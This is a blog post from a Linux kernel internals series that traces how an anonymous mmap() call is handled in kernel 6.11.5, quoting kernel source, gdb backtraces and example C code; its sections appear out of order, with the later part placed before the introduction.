If it does overlap any existing mappings, these will get unmapped. This behaviour is implemented by do_vmi_munmap(), which uses the vma iterator to unmap any vmas whose start address lies in addr to addr + len. Note mappings can be “sealed”[2] and can’t be unmapped like this, causing the current mmap() to fail.
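This replace-on-overlap behaviour is easy to observe from userspace. Here’s a minimal sketch (the function name is mine) that writes to a page, maps over it with MAP_FIXED and checks that we’re now looking at a fresh, zeroed anonymous page at the same address:

```c
#define _GNU_SOURCE
#include <stddef.h>
#include <sys/mman.h>

/*
 * Returns 1 if mapping over an existing page with MAP_FIXED gave us a
 * fresh zeroed page at the same address, 0 if not, -1 on mmap failure.
 */
static int fixed_replaces_mapping(void)
{
	const size_t len = 0x1000;
	unsigned long *old, *fresh;
	int replaced;

	old = mmap(NULL, len, PROT_READ | PROT_WRITE,
		   MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
	if (old == MAP_FAILED)
		return -1;

	*old = 0x41424344UL; /* dirty the original mapping */

	/* Map over the exact same range; the old mapping gets unmapped */
	fresh = mmap(old, len, PROT_READ | PROT_WRITE,
		     MAP_ANONYMOUS | MAP_PRIVATE | MAP_FIXED, -1, 0);
	if (fresh == MAP_FAILED) {
		munmap(old, len);
		return -1;
	}

	replaced = (fresh == old) && (*fresh == 0);
	munmap(fresh, len);
	return replaced;
}
```

The value we wrote is gone because the old mapping was torn down before the new one was set up in its place, which is exactly why MAP_FIXED needs to be used with care.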

	next = vma_next(&vmi);
	prev = vma_prev(&vmi);

mm/mmap.c

Next, the iterator is used to fetch the first vma from where the iterator starts (i.e. the next vma after addr) and the first vma prior to where the iterator starts (i.e. the first vma before addr). mmap_region() will then check the following cases:

Can we merge the new mapping with the next vma instead of creating a new vma?
Can we merge the new OR merged mapping with the prev vma?
Some mappings, denoted by VM_SPECIAL, can’t be merged.
If no merging is possible, allocate a new vma, initialise it and insert it into the mm->mm_mt

VMA Merging

	/* Attempt to expand an old mapping */
	/* Check next */
	if (next && next->vm_start == end && !vma_policy(next) &&
	    can_vma_merge_before(next, vm_flags, NULL, file, pgoff+pglen,
				 NULL_VM_UFFD_CTX, NULL)) {

mm/mmap.c

A few things need to be checked to determine if we can expand an existing vma, instead of allocating a new struct vm_area_struct for our new mapping.

Let’s look at the first case: can we merge the new mapping with the next vma? First, there needs to be a next mapping and it needs to be adjacent to where our new mapping would go (i.e. the end of our new mapping, is the start of next).

Then ![vma_policy(next)](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L765) makes sure next doesn’t have its own specific NUMA policy (memory stuff, stored in vma->vm_policy). Finally [can_vma_merge_before()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L813) carries out the remaining checks, which basically involves:

Checking if the vm_flags, file etc. are compatible. Also, if next has its own vma->vm_ops->close to be called when the vma is closed, it won’t be merged.
If next is an anonymous vma cloned from a parent process, it won’t be merged.

If these checks are passed, next will be expanded to include our new mapping. Either way, similar checks will then be made for prev. If those checks pass, either:

next didn’t merge, in which case we’ll expand prev to include the new mapping
next did merge, in which case prev will be expanded to include the new mapping AND next.

If these checks fail a vma will be allocated for our new mapping.
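The merge cases above can be boiled down to a toy model. To be clear, this is not kernel code: struct toy_vma, enum toy_merge and both functions are invented for illustration, and the compatibility check only compares flags and a "has policy" bit, where the real can_vma_merge_before()/can_vma_merge_after() look at a lot more (file, pgoff, anon_vma, userfaultfd context and so on).

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical, heavily simplified stand-in for struct vm_area_struct. */
struct toy_vma {
	unsigned long start;  /* inclusive */
	unsigned long end;    /* exclusive */
	unsigned long flags;
	bool has_policy;      /* stands in for vma_policy() being non-NULL */
};

enum toy_merge {
	TOY_MERGE_NONE,  /* nothing to merge with: allocate a new vma */
	TOY_MERGE_NEXT,  /* expand next to cover the new range */
	TOY_MERGE_PREV,  /* expand prev to cover the new range */
	TOY_MERGE_BOTH,  /* prev expands over the new range AND next */
};

/* Grossly simplified stand-in for the real compatibility checks. */
static bool toy_compatible(const struct toy_vma *vma, unsigned long flags)
{
	return vma && !vma->has_policy && vma->flags == flags;
}

/* Decide how a new mapping [addr, end) relates to its neighbours. */
enum toy_merge toy_merge_decision(const struct toy_vma *prev,
				  const struct toy_vma *next,
				  unsigned long addr, unsigned long end,
				  unsigned long flags)
{
	/* Neighbours must be compatible and directly adjacent. */
	bool with_next = toy_compatible(next, flags) && next->start == end;
	bool with_prev = toy_compatible(prev, flags) && prev->end == addr;

	if (with_next && with_prev)
		return TOY_MERGE_BOTH;
	if (with_prev)
		return TOY_MERGE_PREV;
	if (with_next)
		return TOY_MERGE_NEXT;
	return TOY_MERGE_NONE;
}
```

The point of the model is just the shape of the decision: adjacency and compatibility are checked per neighbour, and only when both fail do we fall through to allocating a fresh vma.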

VMA Allocation

So, there’s no one for our mapping to merge with. In this case, a new vma will be allocated, initialised and inserted into the mm->mm_mt tree:

	vma = vm_area_alloc(mm);                           [0]
	// SNIP

	vma_iter_config(&vmi, addr, end);                  [1]
	vma_set_range(vma, addr, end, pgoff);              [2]
	vm_flags_init(vma, vm_flags);                      [3]
	vma->vm_page_prot = vm_get_page_prot(vm_flags);    [4]

	if (file) {                                        [5]
		// SNIP
	} else if (vm_flags & VM_SHARED) {                 [6]
		// SNIP
	} else {                                           [7]
		vma_set_anonymous(vma);
	}

	if (map_deny_write_exec(vma, vma->vm_flags)) {     [8]
		error = -EACCES;
		goto close_and_free_vma;
	}

	/* Allow architectures to sanity-check the vm_flags */
	error = -EINVAL;
	if (!arch_validate_flags(vma->vm_flags))
		goto close_and_free_vma;

	error = -ENOMEM;
	if (vma_iter_prealloc(&vmi, vma))                  [9]
		goto close_and_free_vma;

	/* Lock the VMA since it is modified after insertion into VMA tree */
	vma_start_write(vma);                              [10]
	vma_iter_store(&vmi, vma);                         [11]
	mm->map_count++;                                   [12]

mm/mmap.c

Most of this is fairly straightforward: we allocate a new struct vm_area_struct [0], update the iterator [1], update the vma start/end/pgoff [2], its flags and protections [3][4].

Next, there’s some mapping type specific initialisation depending on if it’s a file-backed [5], shared anonymous [6] or private anonymous mapping [7]. In this case, [vma_set_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L909) simply sets vma->vm_ops = NULL. This field being NULL is what marks it as a (private) anonymous vma (as seen by the equivalent [vma_is_anonymous()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L914) check).

There is then a security check [8], [map_deny_write_exec()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mman.h#L192), which will prevent the creation of a mapping with both write and execute permissions if the mm has the MMF_HAS_MDWE flag set (note a similar check is also done by selinux via the mmap_file hook).

Finally, our vma is ready to be inserted into the mm->mm_mt tree. This is done by first preallocating enough nodes for the insertion (store) [9].

Then, if CONFIG_PER_VMA_LOCK=y, the per-vma write lock will be taken [10], which acts as a r/w semaphore in practice. This is interesting, because you might notice there is no matching unlock after [vma_start_write()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm.h#L740). That’s because all vma write locks are unlocked automatically when the mmap write lock is released, read more here.

Finally our new mapping is inserted into the mm->mm_mt tree via the iterator [11], using [vma_iter_store()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/internal.h#L1437), and the process’ total mapping count is updated [12].

Final Bits

	vm_stat_account(mm, vm_flags, len >> PAGE_SHIFT);
	// SNIP
    
	/*
	 * New (or expanded) vma always get soft dirty status.
	 * Otherwise user-space soft-dirty page tracker won't
	 * be able to distinguish situation when vma area unmapped,
	 * then new mapped in-place (which must be aimed as
	 * a completely new data area).
	 */
	vm_flags_set(vma, VM_SOFTDIRTY);

	vma_set_page_prot(vma);

	validate_mm(mm);
	return addr;

mm/mmap.c

There’s some bits we’ve skipped related to files or huge pages, but eventually we’ll get here to the end of the function (we’re almost there!!). So what’s left to do?

Some accounting of course! [vm_stat_account()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L3612) updates various mm stat fields tracking the types of mappings, including: mm->total_vm (total pages), mm->exec_vm, mm->stack_vm and mm->data_vm (private, writable, not stack).

Now, regardless of whether this is a new or expanded vma, the VM_SOFTDIRTY flag is set. Dirty is memory management speak for “this has been modified btw!”. Typically this is in the context of changes to a file in memory that haven’t been written to disk yet. Here, if CONFIG_MEM_SOFT_DIRTY=y, this bit is set to indicate that the vma has been modified (as I understand it, the “soft” part means it doesn’t require immediate action by the kernel, but will be checked when the next relevant action is taken). We’ll touch more on what these “actions” are in the next section when we cover paging.

[vma_set_page_prot()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L90) will update vma->vm_page_prot to reflect vma->vm_flags. Next is [validate_mm()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L322), which is a debugging function that validates the state of the memory mappings. This is only enabled on debug builds with CONFIG_DEBUG_VM_MAPLE_TREE=y.

And last, but not least, we return the addr of our new mapping, which will propagate back, if all is valid, to the return value of the userspace mmap() call.

#0  mmap_region (file=file@entry=0x0 , addr=addr@entry=140379443372032, len=len@entry=4096, vm_flags=vm_flags@entry=115, 
    pgoff=pgoff@entry=34272325042, uf=uf@entry=0xffffc900006bbef0) at mm/mmap.c:2852
#1  0xffffffff81247544 in do_mmap (file=file@entry=0x0 , addr=140379443372032, addr@entry=0, len=len@entry=4096, 
    prot=<optimized out>, prot@entry=3, flags=flags@entry=34, vm_flags=<optimized out>, vm_flags@entry=0, pgoff=<optimized out>, 
    populate=0xffffc900006bbee8, uf=0xffffc900006bbef0) at mm/mmap.c:1468
#2  0xffffffff812160c7 in vm_mmap_pgoff (file=0x0 , addr=0, len=4096, prot=3, flag=34, pgoff=0) at mm/util.c:588
#3  0xffffffff81f8e8fe in do_syscall_x64 (regs=0xffffc900006bbf58, nr=<optimized out>) at arch/x86/entry/common.c:52
#4  do_syscall_64 (regs=0xffffc900006bbf58, nr=<optimized out>) at arch/x86/entry/common.c:83
#5  0xffffffff82000130 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:121

Not much happens when we return back to do_mmap(), other than deciding how many pages, if any, need to be populated, before returning to vm_mmap_pgoff(). This function will then drop the mmap write lock and do any relevant userfaultfd and population bits.

Although out of scope, populating a mapping essentially involves doing what we’re going to cover in the next section (writing to memory) now, instead of waiting to access it.

Then we’re pretty much back in userspace, with a shiny new (or merged) mapping!

Summary

It’s only been, uh, 6000 words or so but just like that we’ve covered this line of code:

addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);

We did a whistle-stop (?!) tour of the mmap() system call, focusing on how private, anonymous mappings are created and managed by the kernel.

We got some first hand experience of how the struct mm_struct helps manage a process’ memory, including the mm->mm_mt tree which tracks the memory areas within the process’ virtual address space, which are represented by struct vm_area_struct.

We also dived into some implementation details, covering some of the security mechanisms and checks, how unused addresses for new mappings are found and the different cases that need to be considered when mapping a new region.

If you’re curious why mmap_min_addr is a thing, this mitigation was added way back in 2009 for 2.X kernels. For context then, check out this post from 2009 on bypassing it. For a bonus, there was a semi recent P0 post about modern NULL ptr deref exploitation.
https://www.kernel.org/doc/html/next/userspace-api/mseal.html

Next Time

Wow, I may have got a bit lost in the sauce for this one (sorry)… Hopefully this is useful for someone. This time we covered the first portion of our simple program: mapping memory. Next time, we’ll move onto writing to memory. Buckle up, as that’ll involve a deep dive into how the kernel does all things (*specifically pertaining to our case study) paging, starting with page faults and going from there (wish me luck).

That said, I think my next post might be more exploitation focused, both for my own sanity after this 6000 word linternals dump and also as it’s been a while since I published some security stuff. Anyways, like I said, I’m hoping this post bordered more on the “in depth but verbose walkthrough of linux internals” and not “mad ramblings of someone who overcommitted to an ambitious series”.

As always feel free to @me (on X, Bluesky or less commonly used Mastodon) if you have any questions, suggestions or corrections :)

Linternals: Exploring The mm Subsystem via mmap [0x01]

sam4k — Mon, 16 Dec 2024 14:00:01 +0000

That’s right, you’re not hallucinating, Linternals is back! It’s been a while, I know, but after some travelling and moving to a new role, I’ve finally found some time to ramble.

For those of you unfamiliar with the series (or have understandably forgotten that it existed), I’ve covered several topics relating to kernel memory management previously:

The “Virtual Memory” series of posts discusses the differences between physical and virtual memory, exploring both the user and kernel virtual address spaces
The series on “Memory Allocators” covers the role of memory allocators in general before moving on to detailing the kernel’s page and slab allocators

This post might be a little different, as I’m writing this introduction before I’ve actually planned 100% what I’ll be writing about. I know I want to explore the memory management (mm) subsystem in more detail, building on what we’ve covered so far, but the issue is…

There’s a LOT to this subsystem, it’s integral to the kernel and interacts with lots of other components. This had me thinking - how do I cover this gargantuan, messy topic in a structured and accessible way?! Where do I begin?? What do I cover???

My plan is to take a leaf out of how I would normally approach researching a new topic like this: start with a high level action (e.g. what the user sees) and follow the source, building up an understanding of the relevant structures and API as we go.

So we’ll take a simple action - mapping and writing to some (anonymous) memory in userspace - and see how deep we can go into the kernel, exploring what is actually going on under the hood. Hopefully this will provide an interesting and informative read, giving some insights on some of the key structures and functions of the kernel’s mm subsystem.

🐧

This post is based on the latest kernel at the time of writing, 6.11.5, and x86_64.

What is Memory Management?
Overview of The MM Subsystem
Getting Lost in The Source
Mapping Memory
Next Time

What is Memory Management?

So before we get stuck into the nitty-gritty details, let’s talk about what we mean by memory management. Fortunately, unlike some of the topics we’ve covered (I’m looking at you SLUB), this one’s fairly self explanatory: it’s about managing a system’s memory.

Memory, in this sense, covers the range of storage a modern system may use: HDDs and SSDs, RAM, CPU registers and caches etc. Managing this involves providing representations of the various types of memory and means for the kernel and userspace to efficiently access and utilise them.

Let’s take the everyday (and oversimplified) example of running a program on our computer. We can see involvement of memory management every step of the way:

First, the program itself is stored on disk and must be read
It is then loaded into RAM, where the physical address in memory is mapped into our process’ virtual address space; commonly loaded data will make use of caches
We’ve talked about how the kernel and userspace have their own virtual address spaces, with their own mappings and protections which need to be managed
Then we have the execution of the code itself which will make use of various CPU registers, it will also need to ask the kernel to do privileged things via system calls, so we also need to consider the transition between userspace and the kernel!

Hopefully this highlights how fundamental the memory management subsystem is and gives a glimpse at its many responsibilities.

Overview of The MM Subsystem

Okay, what does this actually look like? The kernel has several core subsystems, one of which is the memory management subsystem. Looking at the kernel source tree, this is located in the aptly named [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) subdirectory.

I figured we could highlight some of the key files in there to give a sense of the subsystem’s role and structure in a more tangible context. Like many of my decisions, this turned out to be harder than I thought, but we’ll give it a go.

Representing Memory

To be able to manage memory, we need to be able to represent it in a way the kernel can work with. There are a number of key structures used by the [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) subsystem, many of which can be found in include/linux/mm_types.h. This includes:

Representations for chunks of physically contiguous memory ([struct page](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L72)) and the tables used to organise how this memory is accessed.
The [struct mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) provides a description of a process’ virtual address space, including its different areas of virtual memory ([struct vm_area_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L664)).
The [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) also includes a pointer to the upper most table ([pgd_t * pgd](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L806)) which is used to map our process’ virtual addresses to a specific page in physical memory.

Allocating Memory

With our memory represented, we need a way to actually make use of it! The various allocation mechanisms fall under the memory management subsystem, providing ways to manage the pool of available physical memory and allocate it to be used. This includes:

The page allocator ([mm/page_alloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/page_alloc.c)) for allocating physically contiguous memory of at least [PAGE_SIZE](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/page_types.h#L11).
The slab allocator for the efficient allocation of (physically contiguous) objects, via the [kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687) API. [mm/slab.h](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab.h) and [mm/slab_common.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slab_common.c) define the common API, while the SLUB implementation can be found at [mm/slub.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/slub.c).
[mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c) provides an alternative API for allocating virtually contiguous memory and is used for large allocations that may be hard to find physically contiguous space for. E.g. [kvmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L817) will [kmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/slab.h#L687) but use [vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144) as a fallback!

Mapping Memory

So far we’ve touched mainly on how to manage physical memory, but as we know there’s a lot more to it than that! Sure, we can map chunks of physical memory into our virtual address space to work on, but what about stuff that sits on disk?

[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) ([mm/mmap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1521)) is the one-stop shop for userspace mappings and allows us to map physical memory into our process’ virtual address space so we can access it. This can be anonymous memory (i.e. just a chunk of physical memory for us to use) or it can be used to map a previously opened file into our address space too!
[mm/filemap.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/filemap.c) contains some core, generic, functionality for managing file mappings, including the use of a page cache for file data. This can then be utilised by file systems when they [read(2)](https://man7.org/linux/man-pages/man2/read.2.html) or [write(2)](https://man7.org/linux/man-pages/man2/write.2.html) files for example.
The [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322) API is used for mapping device memory into the kernel virtual address space. An example would be a GPU kernel driver mapping some GPU memory into the kernel virtual address space so it can access it. If you recall the post on the kernel virtual address space, you’ll see that the kernel memory map has a specific region for [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322)/[vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144)’d memory! And why do they share memory? Because under the hood [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322) uses the [vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404) API…
The [vmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c#L3404) API allows the kernel to map a set of physical pages to a range of contiguous virtual addresses (within the vmalloc/ioremap space). As we’ve mentioned, this is used by both [vmalloc()](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/vmalloc.h#L144) and [ioremap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/mm/ioremap.c#L322). As a result you can find some functionality for all of them in [mm/vmalloc.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/vmalloc.c).

Managing Memory

We’ve talked a lot about the building blocks for managing memory, but what about actual high level management of memory? Well there’s plenty of that too!

There are a number of syscalls found in [mm/](https://elixir.bootlin.com/linux/v6.11.5/source/mm) related to memory management: [mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) and [munmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) for managing mappings, [mprotect(2)](https://man7.org/linux/man-pages/man2/mprotect.2.html) for managing access protections of mappings, [madvise(2)](https://man7.org/linux/man-pages/man2/madvise.2.html) for giving the kernel advice on how to handle mapped pages, [mlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html) and [munlock(2)](https://man7.org/linux/man-pages/man2/mlock.2.html) to un/lock memory in RAM etc.
We also have other key management functionality such as how to handle when the system runs out of memory ([mm/oom_kill.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/oom_kill.c)) and the memory control groups (memcgs, [mm/memcontrol.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/memcontrol.c)) which provide a way to manage the resources available to specific groups of processes.
[mm/swapfile.c](https://elixir.bootlin.com/linux/v6.11.5/source/mm/swapfile.c) allows us to allocate “swap” files. This allows the kernel to use a portion of disk space (the swap file) as an extension of physical memory. When physical memory availability is low, the kernel will “swap” out inactive/old pages of physical memory to the swap file in order to free up physical memory.

Getting Lost in The Source

Alright, here’s the plan: we will begin our journey with a simple C program that maps some anonymous memory, writes to it and then unmaps it. Sounds easy enough right?

To refresh, “mapping” memory essentially involves pointing some portion of our process’ virtual address space to somewhere in physical memory. This could be a file read into physical memory, but we can also map “anonymous” memory. This is just physical memory that has been allocated specifically for this mapping and wasn’t previously tied to a file. But we’ll get into that more shortly, for now, here’s the code:

#include <sys/mman.h>

int main()
{
    void *addr;

    addr = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE, -1, 0);
    *(long*)addr = 0x4142434445464748;

    munmap(addr, 0x1000);
    return 0;
}

So what’s going on here? We map 0x1000 bytes (i.e. a page) of anonymous memory into our virtual address space, pointed to by addr. We then write 8 bytes, 0x4142434445464748, to that address (which points to a page in physical memory). With our work done, we then unmap the anonymous memory and exit.

Okay, now we understand what the program is doing from a user’s perspective - we’re just writing some bytes to some physical memory we allocated. But what’s the kernel actually doing under the hood? The primary API between the userspace and the kernel is system calls, so we can use [strace](https://man7.org/linux/man-pages/man1/strace.1.html) to understand how our little program interacts with the kernel. Perhaps unsurprisingly, it’s not too dissimilar:

> strace ./mm_example
// snip (process setup)
mmap(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f487ed24000
munmap(0x7f487ed24000, 4096)            = 0
exit_group(0)
+++ exited with 0 +++

The libc mmap() and munmap() calls are just wrappers around the respective system calls, which we can see here. The only part of the program that doesn’t use system calls is when we write to the memory, but as we’ll soon see, that doesn’t mean the kernel isn’t involved!

Mapping Memory

So let’s start our dive into the kernel by seeing how memory is mapped.

void *mmap(void addr[.length], size_t length, int prot, int flags,
                  int fd, off_t offset);
int munmap(void addr[.length], size_t length);

[mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) is the system call which “creates a new mapping in the virtual address space of the calling process”, for usage information check out the man page.

In our case we’re creating a mapping of 0x1000 bytes, AKA PAGE_SIZE. We want to be able to read and write to it, so have specified the PROT_READ | PROT_WRITE protection flags. As we touched on before, we’re not mapping a file or anything, so we specify MAP_ANONYMOUS - we just want to map a page of unused physical memory.

We also specify MAP_PRIVATE, which in the context of an anonymous mapping means that this mapping won’t be shared with other processes, for example if we fork a child process. More broadly speaking it means “Updates to the mapping are not visible to other processes mapping the same file, and are not carried through to the underlying file.” [1].

Finally, because it’s an anonymous mapping the file descriptor and offset fields are ignored (some implementations require the fd to be -1, so that’s why we set it) as we’re not mapping a file in which we might want to map from a specific offset within.

Entering The Kernel

Okay, so we understand the system call from a userspace perspective, how do we go about understanding how it’s implemented? Well, without going into detail on how system calls work, we can generally find a system call’s “entry point” in the kernel by grepping the source for SYSCALL_DEFINE.*:

SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off & ~PAGE_MASK)
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off >> PAGE_SHIFT);
}

arch/x86/kernel/sys_x86_64.c (v6.11.5)

Check out the macros over in [include/linux/syscalls.h](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/syscalls.h) if you’re curious; this will also explain how to figure out the actual symbol for kernel debugging (spoiler: it’s __x64_sys_ in our case).

That said, [mmap(2)](https://man7.org/linux/man-pages/man2/mmap.2.html) was a terrible example for this little auditing tidbit as there are actually a lot of results for SYSCALL_DEFINE.*mmap. This is due to architecture specific implementations and legacy versions. If you wanted to be extra sure you can compare the arguments and architecture, or even whip out a debugger and break further in (e.g. on [do_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1255)) [2] and check the back trace:

(gdb) bt
#0  do_mmap (file=file@entry=0x0 , addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, flags=flags@entry=34, 
    pgoff=pgoff@entry=0, populate=0xffffc900004f7d08, uf=0xffffc900004f7d28) at mm/mmap.c:1408
#1  0xffffffff81890ae1 in vm_mmap_pgoff (file=file@entry=0x0 , addr=addr@entry=0, len=len@entry=8192, prot=prot@entry=3, 
    flag=flag@entry=34, pgoff=pgoff@entry=0) at mm/util.c:551
#2  0xffffffff819139db in ksys_mmap_pgoff (addr=<optimized out>, len=8192, prot=prot@entry=3, flags=34, fd=<optimized out>, 
    pgoff=<optimized out>) at mm/mmap.c:1624
#3  0xffffffff810beff6 in __do_sys_mmap (addr=<optimized out>, len=<optimized out>, prot=3, flags=<optimized out>, fd=<optimized out>, 
    off=<optimized out>) at arch/x86/kernel/sys_x86_64.c:93
#4  __se_sys_mmap (addr=<optimized out>, len=<optimized out>, prot=3, flags=<optimized out>, fd=<optimized out>, off=<optimized out>)
    at arch/x86/kernel/sys_x86_64.c:86
#5  __x64_sys_mmap (regs=0xffffc900004f7f58) at arch/x86/kernel/sys_x86_64.c:86
#6  0xffffffff81008c2e in x64_sys_call (regs=regs@entry=0xffffc900004f7f58, nr=<optimized out>)
    at ./arch/x86/include/generated/asm/syscalls_64.h:10
#7  0xffffffff83be17a6 in do_syscall_x64 (regs=0xffffc900004f7f58, nr=<optimized out>) at arch/x86/entry/common.c:50
#8  do_syscall_64 (regs=0xffffc900004f7f58, nr=<optimized out>) at arch/x86/entry/common.c:80
#9  0xffffffff83e00124 in entry_SYSCALL_64 () at arch/x86/entry/entry_64.S:119

Backtrace from a 5.15 kernel using GDB

`__x64_sys_mmap()`

SYSCALL_DEFINE6(mmap, unsigned long, addr, unsigned long, len,
		unsigned long, prot, unsigned long, flags,
		unsigned long, fd, unsigned long, off)
{
	if (off & ~PAGE_MASK) // [0]
		return -EINVAL;

	return ksys_mmap_pgoff(addr, len, prot, flags, fd, off >> PAGE_SHIFT /* [1] */);
}

arch/x86/kernel/sys_x86_64.c (v6.11.5)

Now we have a starting point, let’s start exploring! [__x64_sys_mmap()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/kernel/sys_x86_64.c#L79) starts off validating the off field, making sure it’s page aligned (i.e. a multiple of PAGE_SIZE) [0] and then shifting it so that [ksys_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/mmap.c#L1476) gets the page offset (instead of the byte offset) [1].

`ksys_mmap_pgoff()`

unsigned long ksys_mmap_pgoff(unsigned long addr, unsigned long len,
			      unsigned long prot, unsigned long flags,
			      unsigned long fd, unsigned long pgoff)
{
	struct file *file = NULL;
	unsigned long retval;

	if (!(flags & MAP_ANONYMOUS)) {
		// SNIP, we have this flag set!
	} else if (flags & MAP_HUGETLB) {
		// SNIP, we don't have this flag set!
	}

	retval = vm_mmap_pgoff(file, addr, len, prot, flags, pgoff);
out_fput:
	if (file)
		fput(file);
	return retval;
}

mm/mmap.c (v6.11.5)

Well this one’s nice and simple for us anonymous mappers! As there’s no file involved and we’re not using huge pages[3] we cruise on into [vm_mmap_pgoff()](https://elixir.bootlin.com/linux/v6.11.5/source/mm/util.c#L575).

`vm_mmap_pgoff()`

Hopefully we’re warmed up now, as we’ve got a bit more going on here!

unsigned long vm_mmap_pgoff(struct file *file, unsigned long addr,
	unsigned long len, unsigned long prot,
	unsigned long flag, unsigned long pgoff)
{
	unsigned long ret;
	struct mm_struct *mm = current->mm;          // [0]
	unsigned long populate;
	LIST_HEAD(uf);

	ret = security_mmap_file(file, prot, flag);  // [1]
	if (!ret) {
		if (mmap_write_lock_killable(mm))    // [2]
			return -EINTR;
		ret = do_mmap(file, addr, len, prot, flag, 0, pgoff, &populate,
			      &uf);
		mmap_write_unlock(mm);
		userfaultfd_unmap_complete(mm, &uf);
		if (populate)
			mm_populate(ret, populate);
	}
	return ret;
}

mm/util.c (v6.11.5)

Fetching Our `mm_struct`

First we fetch a reference to an [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) [0], which as we covered earlier, is a key structure that provides a description of a process’ virtual address space.

stolen from some of my old slides

But whose [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) are we grabbing? The kernel maintains a thread (i.e. a kernel stack) for each userspace process. When a userspace process makes a system call, the kernel executes in the “context” of that process, using its associated kernel stack.

Along with its own kernel stack, each process has a [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) which keeps important data about the process such as its [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779). When the kernel is executing in a process’ context, it can fetch the [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) of the associated userspace process via [current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52).

[current](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L52) is a macro for [get_current()](https://elixir.bootlin.com/linux/v6.11.5/source/arch/x86/include/asm/current.h#L44), which returns the [task_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/sched.h#L758) of the “current” kernel thread. From there we can fetch our [mm_struct](https://elixir.bootlin.com/linux/v6.11.5/source/include/linux/mm_types.h#L779) from the task’s mm member.

A Bit Of Security

Next up we do some security checks [1], via security_mmap_file(). Generally, if we see a kernel function with the security_ prefix it’s a hook belonging to the kernel’s modular security framework[6].

Looking at the code we’ll notice two definitions[4][5], depending on if [CONFIG_SECURITY](https://cateee.net/lkddb/web-lkddb/SECURITY.html) is enabled. We’ll consider the default case, where it is enabled:

/**
 * security_mmap_file() - Check if mmap'ing a file is allowed
 * @file: file
 * @prot: protection applied by the kernel
 * @flags: flags
 *
 * Check permissions for a mmap operation.  The @file may be NULL, e.g. if
 * mapping anonymous memory.
 *
 * Return: Returns 0 if permission is granted.
 */
